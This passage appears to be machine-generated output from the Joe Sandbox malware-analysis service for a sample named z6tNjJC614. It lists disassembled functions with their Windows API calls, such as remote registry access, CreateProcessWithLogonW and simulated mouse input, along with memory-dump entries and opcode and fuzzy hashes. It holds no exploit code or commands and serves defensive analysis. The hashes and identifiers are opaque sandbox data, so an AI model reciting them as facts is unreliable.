                                                                      • API String ID: 3567560977-0
                                                                      • Opcode ID: 57c61c3caded9268a48f30436503899ac23882a99ad1a5924706c8ad38160760
                                                                      • Instruction ID: 89c74605c0cddcefae9efa23ee6230231c50acd4805913136bd5e18aefdf30d2
                                                                      • Opcode Fuzzy Hash: 57c61c3caded9268a48f30436503899ac23882a99ad1a5924706c8ad38160760
                                                                      • Instruction Fuzzy Hash: D7F090B260D7135AE7347774BC0BA8A6F90FF82730F200A1AF460D60D2EFE0844141A0
                                                                      Function 0059B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0059B644
                                                                      • _memset.LIBCMT ref: 0059B653
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005D6F20,005D6F64), ref: 0059B682
                                                                      • CloseHandle.KERNEL32 ref: 0059B694
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                      • String ID: o]$do]
                                                                      • API String ID: 3277943733-4240527779
                                                                      • Opcode ID: e1d2d6d9e1f023bd82c980bf544c91ca192ec72f1a3076adb48162a773b11347
                                                                      • Instruction ID: 520667360645897143c103e3bea97dac28cf2e45c7bcc0d61200b9a5f546fc6d
                                                                      • Opcode Fuzzy Hash: e1d2d6d9e1f023bd82c980bf544c91ca192ec72f1a3076adb48162a773b11347
                                                                      • Instruction Fuzzy Hash: CCF03AB26417067AE3202765BC4AFBB3F9CEB18395F004423FA08E6196D775580697A8
                                                                      Function 0053406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00533F85), ref: 00534085
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0053408C
                                                                      • EncodePointer.KERNEL32(00000000), ref: 00534097
                                                                      • DecodePointer.KERNEL32(00533F85), ref: 005340B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                      • String ID: RoUninitialize$combase.dll
                                                                      • API String ID: 3489934621-2819208100
                                                                      • Opcode ID: c567495195a11dd4a3fcef49aad7124c14644f38316caa25d0ec199d09a24012
                                                                      • Instruction ID: edeb9765f8edac917fa086a50db6f18db98d6b3ed5721e0277fab62250bf127f
                                                                      • Opcode Fuzzy Hash: c567495195a11dd4a3fcef49aad7124c14644f38316caa25d0ec199d09a24012
                                                                      • Instruction Fuzzy Hash: 89E09270686302ABEB20AFA5EC0EB053FA4B724742F114427F101F50A0CBB6960CEB16
                                                                      Function 005764B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 3253778849-0
                                                                      • Opcode ID: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                                      • Instruction ID: f06afcc74be2fd578575b9c8ace388cba5f398282952bbcd4270a7a60b07d8a9
                                                                      • Opcode Fuzzy Hash: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                                      • Instruction Fuzzy Hash: 0A619B3090065BABDF01EF64C899EFE3FA9BF84308F448918F8195B192DB34E945EB50
                                                                      Function 005901E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 00590E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0058FDAD,?,?), ref: 00590E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005902BD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005902FD
                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00590320
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00590349
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0059038C
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00590399
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                      • String ID:
                                                                      • API String ID: 4046560759-0
                                                                      • Opcode ID: 4963377ea487f724c705fce5ea5055cb666fbdb5b080f6013283d39d89e877af
                                                                      • Instruction ID: b0c8bca3b7d83f6e0a8eeb53c2c5c38dbb345790ee63b1406f03e2603accb76d
                                                                      • Opcode Fuzzy Hash: 4963377ea487f724c705fce5ea5055cb666fbdb5b080f6013283d39d89e877af
                                                                      • Instruction Fuzzy Hash: 42513931208205AFDB14EF64C889EAEBBE9FF88314F044D1DF455872A2DB31E945DB52
                                                                      Function 00595799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenu.USER32(?), ref: 005957FB
                                                                      • GetMenuItemCount.USER32(00000000), ref: 00595832
                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0059585A
                                                                      • GetMenuItemID.USER32(?,?), ref: 005958C9
                                                                      • GetSubMenu.USER32(?,?), ref: 005958D7
                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00595928
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                      • String ID:
                                                                      • API String ID: 650687236-0
                                                                      • Opcode ID: f43244fec2e5910127dea58ac69d26c5feaf9927bbc3aefffd15eee11146b3d9
                                                                      • Instruction ID: 6b1b2e39fb3853b957b7f5677e8a984904c48c37f139cc98f029fb580c5e054e
                                                                      • Opcode Fuzzy Hash: f43244fec2e5910127dea58ac69d26c5feaf9927bbc3aefffd15eee11146b3d9
                                                                      • Instruction Fuzzy Hash: 19515B35E00616AFDF12EF64C855AAEBBB4FF48320F114469E806AB351DB70AE51DB90
                                                                      Function 0056EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 0056EF06
                                                                      • VariantClear.OLEAUT32(00000013), ref: 0056EF78
                                                                      • VariantClear.OLEAUT32(00000000), ref: 0056EFD3
                                                                      • _memmove.LIBCMT ref: 0056EFFD
                                                                      • VariantClear.OLEAUT32(?), ref: 0056F04A
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0056F078
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                      • String ID:
                                                                      • API String ID: 1101466143-0
                                                                      • Opcode ID: e803c10878292ec9506e5bcb04188ffaa73757082b635834928eeee19ea91aa7
                                                                      • Instruction ID: a489350c3e9bff4cc187ad28471695a2185a243ad5feb6bf2aec96e0e5f530ca
                                                                      • Opcode Fuzzy Hash: e803c10878292ec9506e5bcb04188ffaa73757082b635834928eeee19ea91aa7
                                                                      • Instruction Fuzzy Hash: C7514D75A00209DFDB14CF58D884AAABBB8FF4C314B15856AE959DB305E335E911CB90
                                                                      Function 0057220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00572258
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005722A3
                                                                      • IsMenu.USER32(00000000), ref: 005722C3
                                                                      • CreatePopupMenu.USER32 ref: 005722F7
                                                                      • GetMenuItemCount.USER32(000000FF), ref: 00572355
                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00572386
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                      • String ID:
                                                                      • API String ID: 3311875123-0
                                                                      • Opcode ID: 4580f0bbb0922b0b18e99f7525f4b29ebe97106d4ce2e3d76a7078dcd810d85f
                                                                      • Instruction ID: b60e83cbf103abc2439b3ced570b009aabe8e66e79c2f19f201cdeef5e0a3ecb
                                                                      • Opcode Fuzzy Hash: 4580f0bbb0922b0b18e99f7525f4b29ebe97106d4ce2e3d76a7078dcd810d85f
                                                                      • Instruction Fuzzy Hash: 2B51C03060024ADFDF21CF68E888BADBFF5FF45318F108A2AE85997291D3748904EB51
                                                                      Function 00511765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 0051179A
                                                                      • GetWindowRect.USER32(?,?), ref: 005117FE
                                                                      • ScreenToClient.USER32(?,?), ref: 0051181B
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0051182C
                                                                      • EndPaint.USER32(?,?), ref: 00511876
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 1827037458-0
                                                                      • Opcode ID: acc5988b004936671ed83a0b4b61dc7366e77a7f8c54d8565952b50f82055cc5
                                                                      • Instruction ID: 6f6bea6dc77051fe33fcb5815cb96df63bc7f0bb4652e9946892a083a3671808
                                                                      • Opcode Fuzzy Hash: acc5988b004936671ed83a0b4b61dc7366e77a7f8c54d8565952b50f82055cc5
                                                                      • Instruction Fuzzy Hash: 9041A070104701AFE720DF24CC84FAA7FE8FB55724F14466AF6A4CA2A1D7309889EB65
                                                                      Function 0059B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(005D57B0,00000000,01004C58,?,?,005D57B0,?,0059B5A8,?,?), ref: 0059B712
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 0059B736
                                                                      • ShowWindow.USER32(005D57B0,00000000,01004C58,?,?,005D57B0,?,0059B5A8,?,?), ref: 0059B796
                                                                      • ShowWindow.USER32(00000000,00000004,?,0059B5A8,?,?), ref: 0059B7A8
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 0059B7CC
                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0059B7EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: e7966a510e52e142f28a29be68ada721fb33f829fef1e5ee13514ee38bb9d557
                                                                      • Instruction ID: 649e2d14a4c789eaceed05ab54d3de5c8b5507d3461f5f64b0c39f454204273c
                                                                      • Opcode Fuzzy Hash: e7966a510e52e142f28a29be68ada721fb33f829fef1e5ee13514ee38bb9d557
                                                                      • Instruction Fuzzy Hash: D2416234600240AFFF25CFA4E699B947FE1FF85310F1842B9E9498F6A2C731A856CB51
                                                                      Function 0058709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00584E41,?,?,00000000,00000001), ref: 005870AC
                                                                        • Part of subcall function 005839A0: GetWindowRect.USER32(?,?), ref: 005839B3
                                                                      • GetDesktopWindow.USER32 ref: 005870D6
                                                                      • GetWindowRect.USER32(00000000), ref: 005870DD
                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0058710F
                                                                        • Part of subcall function 00575244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005752BC
                                                                      • GetCursorPos.USER32(?), ref: 0058713B
                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00587199
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                      • String ID:
                                                                      • API String ID: 4137160315-0
                                                                      • Opcode ID: 8baa860646c638b30dfbeaf669672db80c25f0dfacc2cb9a521b518345e5dd65
                                                                      • Instruction ID: 9c1c0b30c74d0b2867c67ba52a0e047fc8f3a613152eacb7cb5668d63fe76825
                                                                      • Opcode Fuzzy Hash: 8baa860646c638b30dfbeaf669672db80c25f0dfacc2cb9a521b518345e5dd65
                                                                      • Instruction Fuzzy Hash: F131B47250530AABD720EF14D849B5BBBA9FF88314F10091AF989E7191D674EA09CB92
                                                                      Function 00568879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 005680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005680C0
                                                                        • Part of subcall function 005680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005680CA
                                                                        • Part of subcall function 005680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005680D9
                                                                        • Part of subcall function 005680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005680E0
                                                                        • Part of subcall function 005680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005680F6
                                                                      • GetLengthSid.ADVAPI32(?,00000000,0056842F), ref: 005688CA
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005688D6
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 005688DD
                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 005688F6
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0056842F), ref: 0056890A
                                                                      • HeapFree.KERNEL32(00000000), ref: 00568911
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 3008561057-0
                                                                      • Opcode ID: a1faeb42c31bf46a5376270de8af9a3ea75625e50d1b5dacd7830e0c9497519a
                                                                      • Instruction ID: 15fcdaa4c5ef3e4541caec73b4041da45571835bce0f43893b7757033c8cab56
                                                                      • Opcode Fuzzy Hash: a1faeb42c31bf46a5376270de8af9a3ea75625e50d1b5dacd7830e0c9497519a
                                                                      • Instruction Fuzzy Hash: 1211AF31501209FFDB109FA4DC09BBE7B68FB45311F14462DF885D7110CB329914EB60
                                                                      Function 005685B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005685E2
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 005685E9
                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005685F8
                                                                      • CloseHandle.KERNEL32(00000004), ref: 00568603
                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00568632
                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00568646
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      • Opcode ID: c04cc0119a516bca4948e62bdc12f16561c9e9e0acf089b56666a0c04618ecbf
                                                                      • Instruction ID: dc88b4a257a3587ca67f8eff9d1685082aa8874b6896e353e7652fab311a17e6
                                                                      • Opcode Fuzzy Hash: c04cc0119a516bca4948e62bdc12f16561c9e9e0acf089b56666a0c04618ecbf
                                                                      • Instruction Fuzzy Hash: 17115972501209ABDF018FA4DD49BEE7BA9FF18344F054165FE05E2160C7729D64EB60
                                                                      Function 0056B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 0056B7B5
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0056B7C6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0056B7CD
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0056B7D5
                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0056B7EC
                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0056B7FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 081d0cf32114a645f75aa9d2a25c23df7946d3f3dfaa2c479a93f591630085f5
                                                                      • Instruction ID: 3bf1b62feb0377d3d478271eab827b294b68d789f6a277a89301838ce8dffa26
                                                                      • Opcode Fuzzy Hash: 081d0cf32114a645f75aa9d2a25c23df7946d3f3dfaa2c479a93f591630085f5
                                                                      • Instruction Fuzzy Hash: 680184B5E00309BBEB109BA6DC49A5EBFB8EB58321F004076FA04E7291D6309C10DFA0
                                                                      Function 00530162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00530193
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 0053019B
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 005301A6
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 005301B1
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 005301B9
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 005301C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: fe13c7fdb030b11cbecc33ec4bb0c95fb718992bd8c812f27547834975d9ff95
                                                                      • Instruction ID: 74c1caa43d6ec82cb53950815f4fb3b18793e132bb4c78f3b48674360b474293
                                                                      • Opcode Fuzzy Hash: fe13c7fdb030b11cbecc33ec4bb0c95fb718992bd8c812f27547834975d9ff95
                                                                      • Instruction Fuzzy Hash: 4F016CB09017597DE3008F5A8C85B52FFB8FF19354F00411BA15C87941C7F5A868CBE5
